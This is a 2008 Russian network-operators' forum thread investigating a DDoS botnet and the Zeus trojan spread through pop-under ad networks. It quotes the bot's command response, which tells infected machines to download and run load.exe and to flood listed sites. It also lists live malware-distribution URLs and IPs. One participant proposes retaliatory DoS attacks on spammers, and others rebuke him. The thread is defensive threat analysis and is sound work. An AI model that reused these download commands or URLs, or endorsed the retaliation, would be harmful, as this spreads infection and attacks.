kostich Posted April 18, 2008 Posted April 18, 2008 (edited) Один из участников форума обнаружил, что машинка из его сети присутствующая в листинге StopDDOS.ru ходит по HTTP на kowaru.cn, а после чего начинает флудит. Повторив манипуляции руками мы обнаружили в ответе с kowaru.cn вот это: wait 20 tid 4 dload http://78.109.21.42/images2/load.exe rdttp 2 popunder.ru / rdttp 1 kinotraff.ru / rdttp 1 loadfilm.ru / rdttp 1 popsups.ru / rdttp 1 pop-parad.net / rdttp 1 www.popbank.ru / rdttp 2 pop-ip.ru / Могу предположить, что все эти ресурсы сейчас под атакой, а в load.exe дополнительный загрузчик -> http://www.virustotal.com/ru/analisis/c623...c2200f93444dfb4 ps. парам пам пам... Edited April 18, 2008 by kostich Вставить ник Quote
kostich Posted April 18, 2008 Author Posted April 18, 2008 чего-то нашел его в списках на http://malwaredomains.com/ ... может быть DNS-BH для юзеров это панацея? Вставить ник Quote
mikevlz Posted April 18, 2008 Posted April 18, 2008 (edited) Сколько народу использует сервис? Есть статистика по ошибочности? имеется в виду, сколько операторов у себя это использует из присутствующих? Edited April 18, 2008 by mikevlz Вставить ник Quote
kostich Posted April 18, 2008 Author Posted April 18, 2008 (edited) Сколько народу использует сервис? Есть статистика по ошибочности?имеется в виду, сколько операторов у себя это использует из присутствующих? Думаю ошибочность тут обходится, т.к. берем к примеру http://www.malwaredomains.com/files/spywaredomains.zones и в /etc/namedb/blockeddomain.hosts отдаем IP HTTP сервера, который будет отдавать что-то всплывающее и информировать пользователя о том, что если он хочет туда зайти, то пускай это пропишет у себя в hosts файле или будет использовать другой ДНС сервер. Там есть еще domains.txt в котором причины добавления домена были. Можно профильтровать, если что. зы. на малваредомайнс.ком уже раз десятый наступаю... раза два только находил того чего у них не было. Edited April 18, 2008 by kostich Вставить ник Quote
nuclearcat Posted April 18, 2008 Posted April 18, 2008 kostich спасибо за ссылочку. А вы не могли бы написать у себя где-то рекомендации по таким домен-блеклистам и т.п. в сумме? я бы с удовольствием например у себя все это применил. Также вопрос по теме, у кого-нить есть идея как малой кровью запретить юзерам MX запросы? Или хотя бы распознавать эти запросы и блочить юзера (почти 100% заражен, если шурует хотя бы сотню запросов за последние 5 минут). Просто не положено им ставить мыльные сервера и все тут, для отдельных индивидуумов я могу сделать исключение, если будет нужно, пробросом на другой DNS сервер. Вставить ник Quote
kostich Posted April 18, 2008 Author Posted April 18, 2008 kostich спасибо за ссылочку. А вы не могли бы написать у себя где-то рекомендации по таким домен-блеклистам и т.п. в сумме? я бы с удовольствием например у себя все это применил. конечно порекомендовал бы использовать StopBadWare.org от Гугла, но как сливать к себе его базу не знаю. Вставить ник Quote
kostich Posted April 18, 2008 Author Posted April 18, 2008 (edited) Закончилось тем, что вспыл целый кластер для слива malware в т.ч. и на территорию РФ: http://208.66.194.232/40E8001430303030303030303030303030303030303031306C0000018366000000007600000642EB 000530C8D5DCE4 http://208.66.195.15/40E8001430303030303030303030303030303030303031306C0000018366000000007600000642EB 000530C8D5DCE4 http://208.66.195.71/40E8001430303030303030303030303030303030303031306C0000018366000000007600000642EB 000530C8D5DCE4 http://66.232.113.80/40E8001430303030303030303030303030303030303031306C0000018366000000007600000642EB 000530C8D5DCE4 http://75.126.22.226/40E8001430303030303030303030303030303030303031306C0000018366000000007600000642EB 000530C8D5DCE4 http://217.170.77.146/40E8001430303030303030303030303030303030303031306C0000018366000000007600000642EB 000530C8D5DCE4 и как тут жить? -> http://www.virustotal.com/ru/analisis/8cc6...dd73784dadaa78d Edited April 18, 2008 by kostich Вставить ник Quote
Alexander Posted April 18, 2008 Posted April 18, 2008 какой-то странный этот malwaredomains.com - совсем немалварный counter.yadro.ru почему-то в их списке.. Вставить ник Quote
st_re Posted April 19, 2008 Posted April 19, 2008 Неизвестно как себя ведет этот malwaredomains. Как они выносят и проверяют информацию. Бывает, что сломали хостинг, потом вылечили, вынесли все, вылизали. и если админы не знали, что есть такой malwaredomains, то оттуда их сайт не пропадет никогда... или пропадет года через 2.. занос в такой список должен сопровождаться попыткой пинания админов, с выносом по положителной реакции, как минимум. Вставить ник Quote
kostich Posted April 19, 2008 Author Posted April 19, 2008 Неизвестно как себя ведет этот malwaredomains. Как они выносят и проверяют информацию. Бывает, что сломали хостинг, потом вылечили, вынесли все, вылизали. и если админы не знали, что есть такой malwaredomains, то оттуда их сайт не пропадет никогда... или пропадет года через 2.. занос в такой список должен сопровождаться попыткой пинания админов, с выносом по положителной реакции, как минимум. да, вот тут их вся сущность отношений с РУНЕТОМ и проявлется... Вставить ник Quote
kostich Posted April 19, 2008 Author Posted April 19, 2008 (edited) За эпизодическими массовыми заражениями как выяснилось стоят господа из http://popups.ru/, которые устраняют своих конкурентов в области pop-under & pop-up трафика. Переливают траф с главной на pop-master.cn, который стоит на сервере 203.117.170.40... ну т.е. там где когда-то жил popups.ru. В _203.117.170.40/~whyme/my/index.php завернули через _http://atomakayan.biz/whyme/index.php и отдают Zeus -> http://www.virustotal.com/ru/analisis/c72c...324e50b5ef9e6a5, который народу отдают с _http://ftp4sales.cn/zeus/ldr.exe, который зареган на тоже лицо что и pop-master.cn на который льют трафик господа из popups.ru popups.ru - 89.188.104.103 pop-master.cn - 203.117.170.40 ftp4sales.cn - 200.63.46.22 atomakayan.biz - 78.109.28.56 еще у дурика были: timoxin.cn, orentraff.cn, t1ssot.cn PS. popups.ru вирусы malware zeus ззы. порадовал каспер -> http://www.virustotal.com/ru/analisis/cbe7...ddb1f232dc8765c, но им отсылал персонально. Edited April 19, 2008 by kostich Вставить ник Quote
Антон Богатов Posted April 19, 2008 Posted April 19, 2008 которые устраняют своих конкурентов в области pop-under & pop-up трафика. Kostich, объясните плз, что это означает. Что это за трафик такой? Вставить ник Quote
kostich Posted April 19, 2008 Author Posted April 19, 2008 (edited) которые устраняют своих конкурентов в области pop-under & pop-up трафика.Kostich, объясните плз, что это означает. Что это за трафик такой? Рекламный/накруточный трафик во всплывающих окнах над браузером и в появляющихся окнах под браузером. Где-то это делается при закрытии окна, где-то при клике на банеры и т.д... CTR такого трафика маленький, но и трафик дешевый... т.е. 0,5-3$ за 1 тысячу показов. Подобные системы используются иногда _и_ для заражения т.к. имеют механизмы для вычленения подходящих пользователей (user agent, geo location, os version, cookie, etc...) что приводит к заворачиванию на exploits тех кого заведомо заразит на 100% без всякого шума и пыли. Так же хочу обратить внимание, что через данные системы проходят миллионы посетителей в сутки и незаметно заразить 10-30тыс компьютеров для них есть вопрос одного-трех часов и видоизмененных сплойтпак-ов. Edited April 19, 2008 by kostich Вставить ник Quote
Антон Богатов Posted April 19, 2008 Posted April 19, 2008 Спасибо, буду иметь в виду. Полезная инфа... у меня в этой области полный пробел в знаниях. Вставить ник Quote
kostich Posted April 19, 2008 Author Posted April 19, 2008 (edited) Спасибо, буду иметь в виду. Полезная инфа... у меня в этой области полный пробел в знаниях. Вот тут еще почитайте -> http://www.suncash.biz/, а за одно обратите внимание где он живёт. Подобные партнерки есть практически для всех стран и любого типа трафика. ps. на сленге "загрузки" или "инсталлы" означают заражение пользовательских компов. Edited April 19, 2008 by kostich Вставить ник Quote
mikevlz Posted April 20, 2008 Posted April 20, 2008 "антивирусный софт, который не конфликтует с другими вирусами и троянами" ©зач0т Вставить ник Quote
kostich Posted April 20, 2008 Author Posted April 20, 2008 (edited) "антивирусный софт, который не конфликтует с другими вирусами и троянами" ©зач0т это всё фигня по сравнению с тем, что mchost.ru берет бабло в черную от анонимного человека и ложиться грудью на его защиту... отнульраутить бы ***ков по всему префиксу где только можно... но такое развитие маловероятно. Edited April 20, 2008 by kostich Вставить ник Quote
edwin Posted April 21, 2008 Posted April 21, 2008 2nuclearcat: Малой - врятли выйдет. Верояно самым близким по смыслу станет создание своего патча к L7-filter в iptables , но назвать это МАЛОЙ кровью язык не поворачивается. Вставить ник Quote
Сильвер Posted April 22, 2008 Posted April 22, 2008 (edited) Также вопрос по теме, у кого-нить есть идея как малой кровью запретить юзерам MX запросы? Или хотя бы распознавать эти запросы и блочить юзера (почти 100% заражен, если шурует хотя бы сотню запросов за последние 5 минут). http://citrin.ru/freebsd:ng_ipfw_ng_bpfС помощью этого же я блокировал передачу файлов через Oscar AOL. Edited April 22, 2008 by Сильвер Вставить ник Quote
nuclearcat Posted April 22, 2008 Posted April 22, 2008 Сильвер - спасибо. В Linux есть u32 в iptables для этого. Попробую. Вставить ник Quote
nuclearcat Posted April 22, 2008 Posted April 22, 2008 http://www.stearns.org/doc/iptables-u32.v0.1.7.html Вот замечательное руководство по этой опции. Настоятельно советую прочитать возможности хорошо знающим англ. язык. Вставить ник Quote
kostich Posted April 22, 2008 Author Posted April 22, 2008 (edited) Резюме - > http://forum.searchengines.ru/showpost.php...mp;postcount=88. ps. popups.ru закрыт. Edited April 22, 2008 by kostich Вставить ник Quote
ugluck Posted April 22, 2008 Posted April 22, 2008 может, подосить такие сайты? из генераторов? не наказуемо ли это у нас в стране? на телефонных сетях дос спамерам применяется в китае, говорят неплохо действует. у нас это вроде наказуемо, а жаль.. Вставить ник Quote
jab Posted April 22, 2008 Posted April 22, 2008 Вы им так завидуете, что готовы сами стать спаммером ? Вставить ник Quote
ugluck Posted April 22, 2008 Posted April 22, 2008 не завидую. но думаю, что телефонный дос по спамным телефонам - дело атличное. и вообще, еще классики рекомендовали лечить подобное - подобным Вставить ник Quote
.png.5d2afa2996cc6a85d0f2c09b92dd0a28.png)
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.